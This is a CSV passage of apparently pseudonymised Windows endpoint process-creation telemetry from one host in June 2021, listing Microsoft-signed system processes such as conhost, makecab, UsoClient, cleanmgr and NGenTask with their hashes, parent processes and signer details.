20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423917,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,App Uri Handlers Registration Verifier,AppHostNameRegistrationVerifier.exe,App Uri Handlers Registration Verifier
+1070,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.767791200+00:00,8596,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.747446500+00:00,15224,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_7c4e9c7dd9aa59f578618c021eff7e8040de941f.log C:\Windows\Logs\CBS\CbsPersist_20210620032139.cab",True,2021-06-24 00:54:25.737133100+00:00,11908,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.812784700+00:00,2021-06-24 01:03:58.375915200+00:00,b93e2b67-9f47-4133-b7ea-5bcd041dd2e5,computerpii_0a470890c60768167990033d701e7bd881398861,169862,False,10.7740.19041.1052,False,11540474045175440,,11540474045175444,2021-06-24 01:02:09.747446500+00:00,15224,2021-06-24 01:02:09.747446500+00:00,\Device\HarddiskVolume3\Windows\System32\makecab.exe,15224,128,ActiveProcessStartkey,C:\Windows\System32,86528,2034-01-29 18:58:12+00:00,2019-12-07 09:08:46.175635700+00:00,2021-06-24 01:02:09.745850200+00:00,2019-12-07 09:08:46.175635700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1071,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.777070+00:00,9100,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.753459900+00:00,18428,dmclient.exe,dmclient.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.814845+00:00,2021-06-24 01:03:58.375991+00:00,c3f17548-e4d8-4836-ae7e-14d2d11d864b,computerpii_0a470890c60768167990033d701e7bd881398861,169863,False,10.7740.19041.1052,False,11540474045175442,,11540474045175446,2021-06-24 01:02:09.753459900+00:00,18428,2021-06-24 01:02:09.753459900+00:00,\Device\HarddiskVolume3\Windows\System32\dmclient.exe,18428,18560,ActiveProcessStartkey,C:\Windows\System32,121344,2083-12-25 18:01:52+00:00,2021-02-17 04:34:43.549079100+00:00,2021-06-24 01:02:09.745850200+00:00,2021-02-17 04:34:43.547067+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1072,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.785687500+00:00,7688,DiskSnapshot.exe,disksnapshot.exe -z,PortableExecutable,2019-12-07 09:08:37.284740+00:00,C:\Windows\System32\DiskSnapshot.exe,84480,fd450157fcc92c0a80ec3cf22ab5e4b3,2af7212a150b721d0105928864df0049a4d959ad7b5b997df47ba69b434404b3,394166fe3140a310371df5d58e95c0ad86706876,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.819008400+00:00,2021-06-24 01:03:58.376064400+00:00,4bc0f6f7-084d-4921-a210-0ac37c882441,computerpii_0a470890c60768167990033d701e7bd881398861,169864,False,10.7740.19041.1052,False,11540474045136925,,11540474045175448,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,DiskSnapshot.exe,DiskSnapshot.exe,DiskSnapshot.exe
+1073,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.794113600+00:00,5284,dstokenclean.exe,dstokenclean.exe,PortableExecutable,2020-10-09 20:46:58.338966200+00:00,C:\Windows\System32\dstokenclean.exe,13312,79546c85ee91f2aec0b1bc79b07ab154,cd3bd705613b8cd0f25159b32adf38f73fd0b5bb9f384c08bde8214509e0d716,494f1d9531606c7f7df71a95b8963d15b4376aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.822200700+00:00,2021-06-24 01:03:58.376141200+00:00,ee66583a-7dde-4959-ac73-77e801db6cb3,computerpii_0a470890c60768167990033d701e7bd881398861,169865,False,10.7740.19041.1052,False,11540474045136925,,11540474045175450,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,Data Sharing Service Maintenance Driver,dstokenclean.exe,Data Sharing Service Maintenance Driver
+1074,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.800381300+00:00,16604,UsoClient.exe,usoclient.exe StartMaintenanceWork,PortableExecutable,2021-04-14 01:10:15.165138700+00:00,C:\Windows\System32\UsoClient.exe,89600,cb83db7acb08ccd0370200eed9a1803b,278567a8a88fb508453c6e415eba46e1d23a419fc2d09992df95883c9f37cebb,76996171bfcbdfad71405cf376b1cd045a2fbb2e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.843519500+00:00,2021-06-24 01:03:58.376216+00:00,1eb72111-1453-4e4f-9542-08bfa4f9b46f,computerpii_0a470890c60768167990033d701e7bd881398861,169866,False,10.7740.19041.1052,False,11540474045136925,,11540474045175451,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,UsoClient,UsoClient,UsoClient
+1075,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-24 01:02:09.812148900+00:00,18684,cleanmgr.exe,cleanmgr.exe /autoclean /d C:,PortableExecutable,2021-04-14 01:10:31.033943500+00:00,C:\Windows\System32\cleanmgr.exe,320000,ef759fbf8aee871c4accac4a2ef8f9ee,87d5153bec20f9b2e61fb6c6e4f0e49e48ae50691912ce793a599299d31ef671,c94b3634bbf439181de566c1837969daa7b26f70,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.857410700+00:00,2021-06-24 01:03:58.376325700+00:00,b8258ce3-98b7-4d18-b07f-4e41c3c6bc7e,computerpii_0a470890c60768167990033d701e7bd881398861,169867,False,10.7740.19041.1052,False,11540474045136925,,11540474045175452,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423917,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,CLEANMGR,CLEANMGR.DLL,Disk Space Cleanup Manager for Windows
+1076,False,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.790592100+00:00,14600,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:02:09.731000800+00:00,368,sc.exe,sc.exe start w32time task_started,False,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.858548100+00:00,2021-06-24 01:03:58.376408400+00:00,6d441da0-79a2-4d58-bead-cdd7ecf7ef5f,computerpii_0a470890c60768167990033d701e7bd881398861,169868,False,10.7740.19041.1052,False,11540474045175437,,11540474045175449,2021-06-24 01:02:09.731000800+00:00,368,2021-06-24 01:02:09.731000800+00:00,\Device\HarddiskVolume3\Windows\System32\sc.exe,368,18560,ActiveProcessStartkey,C:\Windows\System32,72192,2064-01-25 04:43:49+00:00,2019-12-07 09:09:34.006180900+00:00,2021-06-24 01:02:09.730229600+00:00,2019-12-07 09:09:34.006180900+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1077,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.827659700+00:00,4948,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd450157fcc92c0a80ec3cf22ab5e4b3,2af7212a150b721d0105928864df0049a4d959ad7b5b997df47ba69b434404b3,394166fe3140a310371df5d58e95c0ad86706876,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.785687500+00:00,7688,DiskSnapshot.exe,disksnapshot.exe -z,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.860356900+00:00,2021-06-24 01:03:58.376485300+00:00,77df22d6-ec3a-40d4-9bde-b0234d80ae60,computerpii_0a470890c60768167990033d701e7bd881398861,169869,False,10.7740.19041.1052,False,11540474045175448,,11540474045175453,2021-06-24 01:02:09.785687500+00:00,7688,2021-06-24 01:02:09.785687500+00:00,\Device\HarddiskVolume3\Windows\System32\DiskSnapshot.exe,7688,18560,TerminateProcessStartkey,C:\Windows\System32,84480,2075-04-18 11:44:27+00:00,2019-12-07 09:08:37.284740+00:00,2021-06-24 01:02:09.777094500+00:00,2019-12-07 09:08:37.284740+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,DiskSnapshot.exe,DiskSnapshot.exe,DiskSnapshot.exe,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1078,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.845050300+00:00,1912,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,79546c85ee91f2aec0b1bc79b07ab154,cd3bd705613b8cd0f25159b32adf38f73fd0b5bb9f384c08bde8214509e0d716,494f1d9531606c7f7df71a95b8963d15b4376aeb,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.794113600+00:00,5284,dstokenclean.exe,dstokenclean.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.905443900+00:00,2021-06-24 01:03:58.376780800+00:00,475745f7-1609-453e-b321-1d41923d7b98,computerpii_0a470890c60768167990033d701e7bd881398861,169873,False,10.7740.19041.1052,False,11540474045175450,,11540474045175454,2021-06-24 01:02:09.794113600+00:00,5284,2021-06-24 01:02:09.794113600+00:00,\Device\HarddiskVolume3\Windows\System32\dstokenclean.exe,5284,18560,TerminateProcessStartkey,C:\Windows\System32,13312,1982-03-15 12:43:42+00:00,2020-10-09 20:46:58.338966200+00:00,2021-06-24 01:02:09.792713400+00:00,2020-10-09 20:46:58.338966200+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.84,Data Sharing Service Maintenance Driver,dstokenclean.exe,Data Sharing Service Maintenance Driver,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1079,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.054601200+00:00,19772,CompatTelRunner.exe,CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings -cv:F7gRRJ5BK0CAz4IT.5,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.746054600+00:00,11016,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.164712+00:00,2021-06-24 01:03:58.377218600+00:00,561f8855-3938-4aa1-9de6-a7aac58c7301,computerpii_0a470890c60768167990033d701e7bd881398861,169879,False,10.7740.19041.1052,False,11540474045175439,,11540474045175456,2021-06-24 01:02:09.746054600+00:00,11016,2021-06-24 01:02:09.746054600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,11016,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1080,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.224166300+00:00,2021-06-24 01:03:58.377366100+00:00,21865f5b-bd0c-4081-94ab-88fa5770fefd,computerpii_0a470890c60768167990033d701e7bd881398861,169881,False,10.7740.19041.1052,False,11540474045175434,,11540474045175457,2021-06-24 01:02:09.710620600+00:00,15832,2021-06-24 01:02:09.710620600+00:00,taskhostw.exe,15832,256,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-10 00:46:19.536396300+00:00,2021-04-14 01:10:22.932389100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1081,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.143321300+00:00,2532,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:616",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.227969300+00:00,2021-06-24 01:03:58.377444100+00:00,4dbc446f-d026-4a3b-af47-9eeec780318a,computerpii_0a470890c60768167990033d701e7bd881398861,169882,False,10.7740.19041.1052,False,11540474045175434,,11540474045175458,2021-06-24 01:02:09.710620600+00:00,15832,2021-06-24 01:02:09.710620600+00:00,taskhostw.exe,15832,256,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-10 00:46:19.536396300+00:00,2021-04-14 01:10:22.932389100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1082,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:10.149848200+00:00,18472,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:10.114937600+00:00,16480,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:660",True,2021-06-24 01:02:09.710620600+00:00,15832,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:10.228973500+00:00,2021-06-24 01:03:58.377664400+00:00,d5f453a9-f2e7-4345-a6fa-6a93841fc687,computerpii_0a470890c60768167990033d701e7bd881398861,169883,False,10.7740.19041.1052,False,11540474045175457,,11540474045175459,2021-06-24 01:02:10.114937600+00:00,16480,2021-06-24 01:02:10.114937600+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,16480,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-24 01:02:10.209323600+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
